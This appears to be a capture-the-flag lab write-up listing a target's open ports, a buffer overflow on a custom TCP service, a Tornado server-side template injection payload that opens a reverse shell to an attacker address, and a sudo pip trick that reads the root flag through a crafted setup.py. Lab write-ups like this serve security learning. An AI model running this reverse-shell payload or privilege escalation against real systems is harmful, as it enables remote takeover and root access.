📚 Table of Contents
| Ports | Service | Notes |
|---|---|---|
| 22/tcp | SSH | |
| 80/tcp | HTTP | |
| 2222/tcp | Some TCP Server | Vuln to buff overflow, at least 2000 A’s |
| 9090/tcp | HTTP | Had hidden dir from buff overflow and then SSTI in the tornado webserver |
Our SSTI Payload:
view-source:<http://10.10.19.234:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme=>{% import socket,subprocess,os,pty %}{% from time import sleep %}{{ sleep(5) }}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) }}{{ s.connect(("10.13.14.1",32000)) }}{{ os.dup2(s.fileno(),0) }}{{ os.dup2(s.fileno(),1) }}{{ os.dup2(s.fileno(),2) }}{{ pty.spawn("/bin/bash") }}
SSTI, see above for payload:
Reading material on SSTI: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python
We can run pip as root, so easy privesc:
zeldris@ubuntu:~$ TF=$(mktemp -d)
zeldris@ubuntu:~$ echo 'raise Exception(open("/root/root.txt").read())' > $TF/setup.py
zeldris@ubuntu:~$ sudo pip install $TF
The directory '/home/zeldris/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/zeldris/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing /tmp/tmp.Z7wkPfZA7J
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/tmp/pip-r7iZXg-build/setup.py", line 1, in <module>
raise Exception(open("/root/root.txt").read())
Exception: THN{F4KE_PIP_PACKAGE_INSTALL}